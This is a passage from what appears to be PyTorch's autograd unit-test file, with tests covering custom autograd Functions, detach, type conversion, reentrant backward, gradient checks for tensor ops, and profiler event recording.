# which means that a lot of accessors on them may segfault. Test that we
# properly error in this case.
t = torch.ones(1, requires_grad=True)
t._backward_hooks = dict()
with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"):
f._register_hook_dict(t)
with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"):
f.register_hook(lambda x, y: None)
with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"):
f.next_functions
with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"):
f.name()
with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"):
f.metadata
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, g):
return g
x = torch.zeros(1, requires_grad=True)
y = MyFunction.apply(x)
y.backward()
y.grad_fn.metadata
g = y.grad_fn
del y
g.metadata # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
saved_ctx = []
class Id(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_ctx.append(ctx)
return ctx.saved_tensors
p = torch.zeros(1, requires_grad=True)
loss = Id.apply(p)
loss.backward(retain_graph=True)
del loss
# At this point in time, it complains that the graph has been freed
        # (which is indeed true, although a somewhat indirect way of stating the
# problem).
self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
# This test failed the equality check in PR #22983; it's an interesting
# and different test case worth enshrining. mult1 is not testing
        # anything especially interesting, but mult2 is the interesting case.
def mult1(x):
return x.prod(dim=-1).prod(dim=-1)
class Mult(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = mult1(x)
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return (grad_output * y)[:, None, None] / x
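        # For y = x.prod(dim=-1).prod(dim=-1), dy/dx = y / x elementwise (valid here
        # because the test below uses all-ones inputs), hence (grad_output * y) / x.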
mult2 = Mult.apply
def check_gradgrad_repeated(x, y):
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])
x = torch.ones(2, 4, 4).requires_grad_()
check_gradgrad_repeated(x, mult1(x))
check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
# This test failed complaining that buffers had already been freed
# prior to #22983. Also pretty interesting test case.
class Double(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = x ** 2
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, _ = ctx.saved_tensors
return grad_output * 2 * x
# this is equivalent, but uses the output of .forward() in .backward()
class Double2(Double):
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return grad_output * 2 * y / x
double = Double.apply
double2 = Double2.apply
x = torch.tensor(2).double().requires_grad_()
self.assertTrue(gradcheck(double, x))
self.assertTrue(gradgradcheck(double, x))
self.assertTrue(gradcheck(double2, x))
self.assertTrue(gradgradcheck(double2, x))
y = double(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x)
y = double2(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x) # should not error!
def test_detach(self):
x = torch.randn(10, 10, requires_grad=True)
y = x + 2
y = y.detach()
z = y * 4 + 2
self.assertFalse(y.requires_grad)
self.assertFalse(z.requires_grad)
x = torch.randn(10, 10, requires_grad=True)
y = x * 2
y = y.detach()
self.assertFalse(y.requires_grad)
self.assertIsNone(y.grad_fn)
z = x + y
z.sum().backward()
# This is an incorrect gradient, but we assume that's what the user
# wanted. detach() is an advanced option.
self.assertEqual(x.grad, torch.ones(10, 10))
# in-place detach
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
a = x * 2
(y + a).sum().backward(retain_graph=True)
a.detach_()
self.assertFalse(a.requires_grad)
(y + a).sum().backward() # this won't backprop to x
self.assertEqual(x.grad, torch.ones(10, 10) * 2)
self.assertEqual(y.grad, torch.ones(10, 10) * 2)
        # in-place detach on a view raises an exception
view = x.narrow(0, 1, 4)
self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
"detaching base does not detach view"
x = torch.randn(10, 10, requires_grad=True)
view = x.narrow(0, 1, 4)
x.detach_()
self.assertFalse(x.requires_grad)
self.assertTrue(view.requires_grad)
self.assertIsNotNone(view.grad_fn)
self.assertIs(view._base, x)
def _test_type_conversion_backward(self, t, ):
fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
fvar.double().sum().backward()
self.assertEqual(fvar.grad, torch.ones_like(fvar))
self.assertEqual(type(fvar.grad), type(fvar))
dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
dvar.float().sum().backward()
self.assertEqual(dvar.grad, torch.ones_like(dvar))
self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.int(), torch.IntTensor)
if torch.cuda.is_available():
self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
if torch.cuda.device_count() >= 2:
x2 = x.float().cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
x2 = x.float().cuda()
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 0)
x2 = x2.cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
y = Variable(torch.randn(5).cuda(1), requires_grad=True)
y.cpu().sum().backward()
self.assertIs(y.grad.get_device(), 1)
self.assertIs(y.long().get_device(), 1)
for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
for y_var in (True, False):
y = torch.randint(5, (5, 5), dtype=t.dtype)
y = Variable(y) if y_var else y
self.assertIsInstance(x.type(t), t)
self.assertIsInstance(x.type_as(y), t)
# TODO: t.dtype should work
t_dtype = t().dtype
self.assertIsInstance(x.type(t_dtype), t)
self.assertIs(t_dtype, x.type(t_dtype).dtype)
self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
if torch.cuda.is_available():
for x_cuda in (True, False):
for y_cuda in (True, False):
x_c = x.cuda() if x_cuda else x
y_c = y.cuda() if y_cuda else y
_, y_type = y_c.type().rsplit('.', 1)
y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())
self._test_type_conversion_backward(lambda x: x)
if torch.cuda.is_available():
self._test_type_conversion_backward(lambda x: x.cuda())
if torch.cuda.device_count() >= 2:
# one of these has to be the non-default device
self._test_type_conversion_backward(lambda x: x.cuda(0))
self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
b = torch.max(a, 1, True)[1].repeat(1, 5).double()
o = (b + a).sum()
o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
x = torch.randn(2, 2, requires_grad=True)
err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
x.numpy()
with torch.no_grad():
x.numpy()
x = torch.randn(2, 2)
x.numpy()
with torch.no_grad():
x.numpy()
def test_return_leaf(self):
class Identity(Function):
@staticmethod
def forward(ctx, a, b):
return a, a + b
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a + grad_b, grad_b
hook_called = [False]
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q, p = Identity.apply(x, y)
# Make sure hooks only receive grad from usage of q, not x.
def hook(grad):
hook_called[0] = True
self.assertEqual(grad, torch.ones(5, 5))
q.register_hook(hook)
(q + p + x).sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5) * 3)
self.assertEqual(y.grad, torch.ones(5, 5))
self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
class Inplace(InplaceFunction):
@staticmethod
def forward(ctx, a, b):
ctx.mark_dirty(a)
return a.add_(b), b + 2
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a, grad_a + grad_b
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
q, p = Inplace.apply(x, y)
self.assertIs(q, x)
self.assertIs(q.grad_fn.__class__, Inplace._backward_cls)
self.assertTrue(q.requires_grad)
q.sum().backward()
self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
x = torch.randn(5, 5)
y = torch.randn(5, requires_grad=True)
z = torch.randn(5, requires_grad=True)
x[0] = y
x[1] = 2 * z
self.assertTrue(x.requires_grad)
self.assertIsNot(x.grad_fn, None)
x.sum().backward()
self.assertEqual(y.grad, torch.ones(5))
self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5)
with torch.no_grad():
x[0] = y
self.assertTrue(x.requires_grad)
self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
x = torch.randn(5, requires_grad=True)
y = torch.randn(5, requires_grad=True)
z = (x * y).sum()
with torch.no_grad():
x *= 2
self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
lambda: z.backward())
def test_no_grad_input(self):
class MyFunction(Function):
@staticmethod
def forward(self, x):
return x
@staticmethod
def backward(self, grad_output):
return grad_output
x = torch.randn(5, requires_grad=True)
with torch.no_grad():
y = MyFunction.apply(x)
self.assertTrue(x.requires_grad)
self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
        # This test checks the backward engine for a very subtle bug that appeared
        # in one of the initial versions of autograd. Gradient tensors were
# simply stored in lists while the function waited for all its gradients
# to be computed. However, sometimes an output was used multiple times,
        # so the gradients needed to be summed. The engine used to keep a need_copy
        # set of tensors that would need a clone upon the next addition and removed
# them from the set as soon as the clone was performed. However, this
# could lead to incorrect results if the same gradient tensor was
# buffered in three places in the graph:
# 1. When accumulating gradients in one of these places it was cloned
# and removed from need_copy set.
# 2. When accumulating in second place, it wasn't in the need_copy set,
# so the gradients were simply accumulated in-place (which already
# modified the grad in 3rd place)
# 3. When accumulating in the third place, it wasn't in the need_copy set
# as well, so the incoming gradient was summed in-place, yielding
# incorrect results in all functions, except the first one.
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5, requires_grad=True)
# Simulate that we're in the middle of the graph
a = x + 2
b = y + 2
c = x + 2
# This op will just return grad_output two times in backward
add1 = a + b
add2 = add1 + c
# Simulate a long branch, so grad_output will get buffered.
for _ in range(4):
a = a * 2
b = b * 2
c = c * 2
branch = a + b + c
out = add2 + branch
# expected gradients are:
# for x: 34 (16 from final a, 16 from final c, 2 from add2)
# for y: 17 (16 from final b, 1 from add2)
grad_output = torch.ones(5, 5)
out.backward(grad_output)
self.assertEqual(x.grad, torch.ones(5, 5) * 34)
self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
test_case = self
class MyFn(Function):
@staticmethod
def forward(ctx, input):
ctx.save_for_backward(None, input, None)
return input * input
@staticmethod
def backward(ctx, grad_output):
n1, input, n2 = ctx.saved_tensors
test_case.assertIsNone(n1)
test_case.assertIsNone(n2)
return 2 * input * grad_output
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
class MyFn(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None, None
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
class F1(Function):
@staticmethod
def forward(ctx, input):
out = torch.randn(input.size())
ctx.mark_non_differentiable(out)
return input, out
@staticmethod
def backward(ctx, grad_output, ignored):
return grad_output
class F2(Function):
@staticmethod
def forward(ctx, input, ignored):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None
x = torch.randn(5, requires_grad=True)
a, b = F1.apply(x)
b = b + 1 # separate F1 from F2 by another op
self.assertTrue(a.requires_grad)
self.assertFalse(b.requires_grad)
c = F2.apply(a, b)
c.backward(torch.ones(c.size()))
self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
y_data = torch.randn(2, 2)
class Reenter(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x, requires_grad=True)
ctx.y = Variable(y_data, requires_grad=True)
ctx.output_var = ctx.x * ctx.y
return ctx.output_var.detach()
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
ctx.output_var.sum().backward()
return ctx.x.grad * grad_output
# Reentrant starts on the CPU thread, finishes on the GPU thread
x = torch.randn(2, 2, requires_grad=True)
out = Reenter.apply(x)
out.sum().backward()
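# In backward, ctx.output_var = ctx.x * ctx.y, so ctx.x.grad equals y_data; with a
# grad_output of ones coming from sum(), x.grad should therefore equal y_data.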
self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
# Parent graph.
a = torch.rand(3, 3, requires_grad=True)
c = a * a
# Reentrant child graph.
b = torch.rand(3, 3, requires_grad=True)
e = b * b
f = TestAutograd.SimulateBackwardError.apply(e)
reentrant_root = f.sum()
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will throw an error.
reentrant_root.backward()
return grad
d = ReentrantFunc.apply(c)
with self.assertRaisesRegex(Exception, 'Simulate error'):
d.sum().backward()
# TODO: Create OpInfos for these ops
def test_broadcast_tensors(self):
f_args_variable = (torch.randn(3, dtype=torch.double, requires_grad=True),
torch.randn(1, 2, 1, dtype=torch.double, requires_grad=True),
torch.randn(1, 1, dtype=torch.double, requires_grad=True),
torch.randn(5, 1, 1, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_broadcast_tensors", "broadcast",
lambda a, b, c, d: torch.broadcast_tensors(a, b, c, d),
True, f_args_variable, f_args_tensor)
def test_block_diag(self):
f_args_variable = (torch.randn(1, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_block_diag", "block_diag",
lambda a, b, c: torch.block_diag(a, b, c),
True, f_args_variable, f_args_tensor)
def test_cat(self):
f_args_variable = (torch.randn(1, S, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, S, dtype=torch.double, requires_grad=True),
0)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_1(self):
f_args_variable = (torch.randn(S, S, 1, dtype=torch.double, requires_grad=True),
torch.randn(S, S, 2, dtype=torch.double, requires_grad=True),
torch.randn(S, S, 3, dtype=torch.double, requires_grad=True),
-1)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_negdim_1", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_2(self):
f_args_variable = (torch.randn(S, 1, S, dtype=torch.double, requires_grad=True),
torch.randn(S, 2, S, dtype=torch.double, requires_grad=True),
torch.randn(S, 3, S, dtype=torch.double, requires_grad=True),
-2)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_negdim_2", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_empty_legacy(self):
f_args_variable = (torch.randn(0, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
# gradgradcheck doesn't work, probably because legacy size tracking is wrong somewhere,
# hence False is passed below, but gradcheck is run explicitly.
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty_legacy", "cat",
lambda a, b: torch.cat((a, b)),
False, f_args_variable, f_args_tensor, check_forward_ad=True)
self.assertTrue(gradcheck(lambda a, b: torch.cat((a, b)), f_args_variable, eps=1e-6, atol=PRECISION))
def test_cat_empty(self):
f_args_variable = (torch.randn(0, S, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty", "cat",
lambda a, b: torch.cat((a, b)),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_var_mean_differentiable(self):
dim = [2, 4]
keepdim = False
input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
input2 = deepcopy(input1)
var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
var2 = input2.var(dim=dim, keepdim=keepdim)
mean2 = input2.mean(dim=dim, keepdim=keepdim)
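# With keepdim=False the reduced dims 2 and 4 (sizes 5 and 2) are dropped from
# (3, 4, 5, 6, 2, 3), so the gradient below has shape (3, 4, 6, 3).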
grad = torch.randn(3, 4, 6, 3, requires_grad=True)
r1 = var1 * var1 * mean1 * mean1
r2 = var2 * var2 * mean2 * mean2
self.assertTrue(torch.allclose(r1, r2, rtol=0.01, atol=0.0))
torch.autograd.backward(r1, grad)
torch.autograd.backward(r2, grad)
self.assertTrue(torch.allclose(input1.grad, input2.grad, rtol=0.01, atol=0.0))
@slowTest
@skipIfNoLapack
def test_lobpcg(self):
def func(k, A, largest=True, B=None):
X_shape = list(A.shape)
X_shape[-1] = k
X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
if A.dim() > 2:
X = X.expand(X_shape)
D, U = torch.lobpcg(A=A, k=k, B=B, X=X)
# LOBPCG uses a random initial eigenspace approximation
# if parameter `X` is not provided.
# This may cause non-deterministic behavior
# when it comes to the sign of an eigenvector
# (note that if v is an eigenvector, so is -v),
# hence we eliminate this non-determinism
# by making sure that each column of U
# gets multiplied by the sign of its max (in absolute value) element.
# Also, gradcheck changes the content of the input by +/- eps (defaults to 1e-06)
# to compute the numerical gradient, which can also cause the signs to flip.
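# For example, if a column's largest-magnitude entry is negative, multiplying the
# column by its sign (-1) flips it, so U and -U are normalized to the same representative.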
_, idx = U.abs().max(-2, keepdim=True)
sign = U.gather(-2, idx).sign()
U = U * sign
return D, U
# TODO: review if this can be ported to OpInfos or moved to test_linalg.py
def run_symeig_test(k, sizes, largest=True):
A = torch.rand(*sizes).double()
A = A.matmul(A.transpose(-1, -2)) / 10
A.requires_grad_(True)
gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)
# Custom gradient vectors for better stability due to some
# non-determinism in lobpcg's forward.
# Note that this is not required if symeig is used in the forward instead (tested).
D_grad = torch.rand(*A.shape[:-2], k) / 100
U_grad = torch.rand(*A.shape[:-1], k) / 100
gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)
# check whether A.grad is symmetric
A = A.detach().requires_grad_(True)
D, U = func(k, A, largest)
(D.sum() + U.sum()).backward()
self.assertEqual(A.grad, A.grad.transpose(-1, -2))
# the tests below take about 1-2 minutes to finish,
# but we want to be extra sure that the backward is correct.
for largest in [True, False]:
run_symeig_test(1, (6, 6), largest=largest)
run_symeig_test(1, (2, 6, 6), largest=largest)
run_symeig_test(1, (2, 2, 6, 6), largest=largest)
run_symeig_test(2, (6, 6), largest=largest)
run_symeig_test(2, (2, 6, 6), largest=largest)
run_symeig_test(2, (2, 2, 6, 6), largest=largest)
run_symeig_test(3, (9, 9), largest=largest)
run_symeig_test(3, (2, 9, 9), largest=largest)
run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
def get_out_and_unrefed_cycle():
inp = torch.randn(10, requires_grad=True)
tmp = inp.view(10, 1)
out = tmp.view(10)
# Create a reference cycle that contains an
# intermediary Variable in the graph
my_list = []
my_list.append(tmp)
my_list.append(my_list)
return out
out = get_out_and_unrefed_cycle()
gc.collect()
# This will segfault if things have been erroneously released
out.backward(torch.randn(out.size()))
def test_maximum_and_minimum_subgradient(self):
def run_test(f, a, b, expected_a_grad, expected_b_grad):
a = torch.tensor(a, requires_grad=True)
b = torch.tensor(b, requires_grad=True)
z = f(a, b)
z.sum().backward()
self.assertEqual(a.grad, expected_a_grad)
self.assertEqual(b.grad, expected_b_grad)
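# Where the inputs tie (a == b), the expectations below encode the convention of
# splitting the gradient evenly, 0.5 to each input; elsewhere the selected input
# gets the full gradient.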
run_test(torch.maximum, [0., 1., 2.], [1., 1., 1.], [0., 0.5, 1.], [1., 0.5, 0.])
run_test(torch.minimum, [0., 1., 2.], [1., 1., 1.], [1., 0.5, 0.], [0., 0.5, 1.])
# TODO: norm is deprecated, update these tests and port them to OpInfos
# or test_linalg.py
def test_norm_subgradient(self):
def run_test(input_size, norm_deg):
input = torch.zeros(*input_size, requires_grad=True)
input.norm(norm_deg).backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), 2)
run_test((10, 10), 2)
run_test((10,), 3)
run_test((10,), 1)
run_test((10,), 1.5)
run_test((10,), inf)
def test_norm_inf_subgradient(self):
def run_test(input, expected, dim=None):
x = torch.tensor(input, requires_grad=True)
out = x.norm(inf, dim=dim, keepdim=True)
out.backward(torch.ones(out.size()))
self.assertEqual(x.grad, expected)
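# The expectations below encode an even split of the inf-norm gradient among the
# elements attaining the maximum absolute value (two ties -> 0.5 each, four ties
# -> 0.25 each); an all-zero input gets zero gradient.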
run_test([0., 0., 0.], [0., 0., 0.])
run_test([1., 0., 1.], [0.5, 0., 0.5])
run_test([[1., 0., 1.], [0., 1., 1.]], [[0.25, 0., 0.25], [0., 0.25, 0.25]])
run_test([[1., 0., 1.], [0., 1., 0.]], [[0.5, 0., 0.5], [0., 1., 0.]], (1,))
run_test(torch.ones((2, 2, 2)), torch.full((2, 2, 2), 0.25), (0, 2))
# TODO: review porting these to OpInfo tests
def test_pow_zero_tensor_gradient(self):
def run_test(input_size, exponent):
input = torch.zeros(*input_size, requires_grad=True)
input.pow(exponent).sum().backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), torch.zeros(10))
run_test((10, 10), torch.zeros(10, 10))
run_test((10,), 0)
def test_pow_scalar_base(self):
a = torch.arange(1, 13, dtype=torch.double).view(3, 4).requires_grad_()
gradcheck(lambda a: torch.pow(2, a), (a,))
def test_sinc(self):
# The derivative of sinc(x) at x=0 has to be special cased.
# A naive computation will result in 0/0 -> NaN.
# We also need to be careful when we are very close to 0, as the
# derivative's denominator is squared, and there are some floats
# that are positive and whose squares are zero.
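# For reference: with torch.sinc's convention sinc(x) = sin(pi*x) / (pi*x), the
# derivative is (pi*x*cos(pi*x) - sin(pi*x)) / (pi*x**2), which tends to 0 as x -> 0;
# the squared x in the denominator is why a positive input whose square underflows
# to zero (e.g. torch.finfo(torch.double).tiny) needs care.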
a = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0],
dtype=torch.double,
requires_grad=True)
gradcheck(torch.sinc, a)
def test_igamma(self):
# 1e-3 offset to avoid zeros
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double) + 1e-3).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_igammac(self):
# 1e-3 offset to avoid zeros in s
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double)).requires_grad_()
gradcheck(torch.igammac, (s, x))
gradgradcheck(torch.igammac, (s, x))
def test_profiler(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
self.assertTrue(torch.autograd._profiler_enabled())
y = x * 2 + 4
self.assertFalse(torch.autograd._profiler_enabled())
names = ['aten::mul', 'aten::add']
found_indices = set()
for evt in p.function_events:
if evt.name in names:
found_indices.add(names.index(evt.name))
self.assertEqual(len(found_indices), len(names))
def test_profiler_seq_nr(self):
with profile(use_kineto=kineto_available()) as p:
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
z = x + y
s = z.sum()
s.backward()
print(p.key_averages().table(
sort_by="self_cpu_time_total", row_limit=-1))
# expecting aten::add and aten::sum to have sequence numbers,
# and the corresponding backward nodes to have the same numbers
# as the forward ops
add_seq_nr = -1
sum_seq_nr = -1
found_add = found_sum = False
found_bwd_add = found_bwd_sum = False
found_empty = False
for e in p.function_events:
if e.name == "aten::add":
add_seq_nr = e.sequence_nr
self.assertFalse(found_add)
found_add = True
elif e.name == "aten::sum":
sum_seq_nr = e.sequence_nr
self.assertFalse(found_sum)
found_sum = True
elif "Add" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, add_seq_nr)
self.assertFalse(found_bwd_add)
found_bwd_add = True
elif "Sum" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, sum_seq_nr)
self.assertFalse(found_bwd_sum)
found_bwd_sum = True
# check that nested ops (e.g. empty) don't have
# a sequence number
if e.name == "aten::empty":
self.assertEqual(e.sequence_nr, -1)
found_empty = True
self.assertGreaterEqual(add_seq_nr, 0)
self.assertGreaterEqual(sum_seq_nr, 0)
self.assertNotEqual(add_seq_nr, sum_seq_nr)
self.assertTrue(found_add)
self.assertTrue(found_sum)
self.assertTrue(found_bwd_add)
self.assertTrue(found_bwd_sum)
self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
x = torch.rand(3, 4)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
x.resize_([3, 2])
def test_profiler_propagation(self):
def foo(x):
with record_function("in_foo") as rf:
return x * 2
x = torch.rand(3, 4)
traced_foo = torch.jit.trace(foo, x)
def bar(x):
with record_function("in_bar") as rf:
# we expect that the profiler will be able
# to propagate across the fork
fut = torch.jit._fork(traced_foo, x)
y = torch.jit._wait(fut)
# note: continuation (and rf's end) can
# be executed in a different thread
with record_function("in_bar_after_wait") as rf2:
y = y * 2
return y
traced_bar = torch.jit.trace(bar, x)
with profile(use_kineto=kineto_available()) as p:
traced_bar(x)
found_foo = False
found_bar = False
found_bar_after_wait = False
for info in p.function_events:
if info.name == "in_foo":
self.assertFalse(found_foo)
found_foo = True
elif info.name == "in_bar":
self.assertFalse(found_bar)
found_bar = True
elif info.name == "in_bar_after_wait":
self.assertFalse(found_bar_after_wait)
found_bar_after_wait = True
self.assertTrue(found_foo)
self.assertTrue(found_bar)
self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
with record_function("foo"):
y = x * 2 + 4
function_events = p.function_events
foo_event = [event for event in function_events if "foo" in event.name][0]
self.assertEqual(foo_event.count, 1)
def test_profiler_aggregation_fake(self):
events = EventList()
id = [0]
def get_id():
id[0] = id[0] + 1
return id[0]
# [[thread_id, [(start, end, id), ....]], ...]
# Using a list instead of a dict so that order is guaranteed for any Python
# version
threads = [
[1, [(0, 1, get_id()), (1, 2, get_id())]],
[0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
]
for thread, ranges in threads:
for range in ranges:
assert(len(range) == 3)
events.append(
FunctionEvent(
id=range[2],
node_id=0,
name="",
thread=thread,
start_us=range[0],
end_us=range[1],
)
)
events._populate_cpu_children()
# Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
# as a child of [1, 3]
res = [[], [], [], [], [4]]
def get_children_ids(event):
return [child.id for child in event.cpu_children]
assert([get_children_ids(event) for event in events] == res)
def test_profiler_aggregation_table(self):
"""
Test if the profiling result is aggregated for `str(prof)`
See: https://github.com/pytorch/pytorch/issues/37500
"""
x = torch.randn(1024)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
torch.einsum("i->", x)
prof_str = str(prof)
prof_table = prof.table()
self.assertEqual(prof_table, prof_str)
def test_profiler_function_event_avg(self):
avg = FunctionEventAvg()
